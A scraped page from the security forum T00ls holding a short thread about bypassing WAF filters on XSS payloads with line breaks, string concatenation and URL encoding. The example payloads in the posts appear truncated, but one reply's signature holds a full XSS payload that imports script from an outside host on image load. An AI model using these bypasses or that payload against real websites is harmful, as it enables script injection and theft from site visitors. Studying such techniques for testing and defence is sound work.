白帽子安全
厂商漏洞预警
业内新闻动态
安全研究
开源工具分享
技术交流讨论
原创文章发布
AI与区块链安全研究
程序代码学习
WEB代码审计
0day漏洞分析
渗透测试文章
Linux/无线/终端 安全
反病毒/逆向/免杀 二进制
安全检测工具
社会工程交流
夺旗赛研究
甲方文档资料
开源CMS源码
加密破解及悬赏
非安全交流
AI应用交流
VPS服务器讨论
区块链币圈交流
手机卡信用卡
域名外贸跨境
电子产品交流
非技术交流
八卦水区
论坛事务
人才招聘
登录
注册
导航
×
首页
白帽子安全
厂商漏洞预警
(2523)
业内新闻动态
(5886)
安全研究
开源工具分享
(175)
技术交流讨论
(19762)
原创文章发布
(20)
AI与区块链安全研究
(29)
程序代码学习
(1041)
WEB代码审计
(1288)
0day漏洞分析
(30)
渗透测试文章
(5928)
Linux/无线/终端 安全
(248)
反病毒/逆向/免杀 二进制
(459)
安全检测工具
(1692)
社会工程交流
(125)
夺旗赛研究
(337)
甲方文档资料
(109)
开源CMS源码
(38)
加密破解及悬赏
(1948)
非安全交流
AI应用交流
(20)
VPS服务器讨论
(45)
区块链币圈交流
(25)
手机卡信用卡
(7)
域名外贸跨境
(9)
电子产品交流
(44)
非技术交流
八卦水区
(6395)
论坛事务
(1651)
人才招聘
(38)
T00ls
»
八卦水区(Discussion )
XSS bypass 小记
twodog
2020-11-17 14:38
389
8
好帖, 支持TA
取消
很可惜, 此ID报废之前, 请仔细阅读论坛总架构中的规则贴:
论坛总规则
Reason:
确认要报废此ID!
取消
twodog
新手上路
#1
有时候waf会针对payload过滤onerror、alert等之类的关键字事件属性,或者把关键字事件替换成其他字符,单独的事件属性不会防护,这时候可以用换行来解决<
如果只单独针对alert做防护的话就可以用拼接的方式来绕过,类似于:<其他事件参考如上
想变强
twodog
新手上路
2020-11-17
#2
能不能麻烦版主把它移到技术讨论区-。-谢谢
@godblack
@t00ls管理团队17
想变强
w7say
注册会员
2020-11-17
#3
lz方法没解析成功,换了种
平淡的人生需要些荒诞。
yuyansec
注册会员
2020-11-19
#4
这网上不是有大把吗(没恶意)
stay-src
新手上路
2020-11-20
#5
感觉一般的waf厉害的都能防住,不厉害的怎么都防不住
twodog
新手上路
2020-12-02
#6
回复
4#
Anonymous
我想分享一下这个刚好碰到的案例
aldys4
新手上路
2021-01-13
#7
回复
3#
w7say
这不是同一种方法吗?%2b只是在请求中把+编码了一遍,毕竟+在请求中会被直接解析成空格这种事正常人的大脑还是能理解的
w7say
注册会员
2021-01-15
#8
回复
7#
aldys4
你是说我大脑不正常?
SuNu11
版主
2021-06-30
#9
on事件过滤有路子嘛?lz
有志者、事竟成,破釜沉舟
<Img Src=//x.is OnLoad=import(src)>
打赏
×
TuBi 数量 (1~49)
1
5
10
20
49
评价理由
确认
取消
帖子评分
×
撤销评分
×
twodog
新手上路
楼主
5
主题
13
帖子
198
TuBi
TA的主帖
私信TA
返回版块
社区首页
本版最新
发现被CNVD或者CVE收录的漏洞难度大吗
请问有没有什么比较好的入门路径呢
国产最强模型“智谱”,正在打包你的东西
测试个漏洞-001
内网信息收集教程
IDA 9.4 中文插件
AI实时换脸
谁有恶魔之眼信息收集工具
移动端app 安全渗透测试
固件漏洞挖掘学习